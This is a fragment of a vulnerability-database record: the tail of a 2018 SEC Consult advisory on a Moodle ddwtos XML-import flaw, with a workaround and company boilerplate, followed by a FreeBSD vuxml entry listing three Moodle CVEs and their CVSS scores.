\nhttps://moodle.org/mod/forum/discuss.php?d=376023#p1516118 \n \n \nWorkaround: \n----------- \nDisable import of ddwtos questions through XML files. \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/career/index.html \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/contact/index.html \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF J. 
Moritz / @2018 \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149426/SA-20180918-0.txt"}], "freebsd": [{"lastseen": "2019-05-29T18:31:51", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14630", "CVE-2018-14631", "CVE-2018-1999022"], "description": "\nmoodle reports:\n\nMoodle XML import of ddwtos could lead to intentional remote code\n\t execution\nQuickForm library remote code vulnerability (upstream)\nBoost theme - blog search GET parameter insufficiently filtered\n\n", "edition": 3, "modified": "2018-09-05T00:00:00", "published": "2018-09-05T00:00:00", "id": "074CB225-BB2D-11E8-90E1-FCAA147E860E", "href": "https://vuxml.freebsd.org/freebsd/074cb225-bb2d-11e8-90e1-fcaa147e860e.html", "title": "moodle -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}